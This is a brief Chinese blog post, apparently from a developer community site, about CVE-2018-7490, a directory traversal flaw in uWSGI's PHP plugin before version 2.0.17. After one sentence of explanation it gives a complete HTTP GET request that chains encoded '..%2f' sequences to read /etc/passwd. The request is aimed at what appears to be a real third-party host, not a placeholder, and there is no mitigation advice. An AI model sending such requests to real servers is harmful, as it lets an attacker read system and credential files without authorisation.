uWSGI-CVE-2018-7490 PHP插件目录穿越漏洞

用户29905586687
73 阅读1分钟

uWSGI 2.0.17 之前的 PHP 插件,没有正确的处理 DOCUMENT_ROOT 检测,导致用户可以通过 ..%2f 来跨越目录,读取或运行 DOCUMENT_ROOT 目录以外的文件。

GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1
Host: downgame.shuowan.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
​

image.png

avatar
文章
阅读
粉丝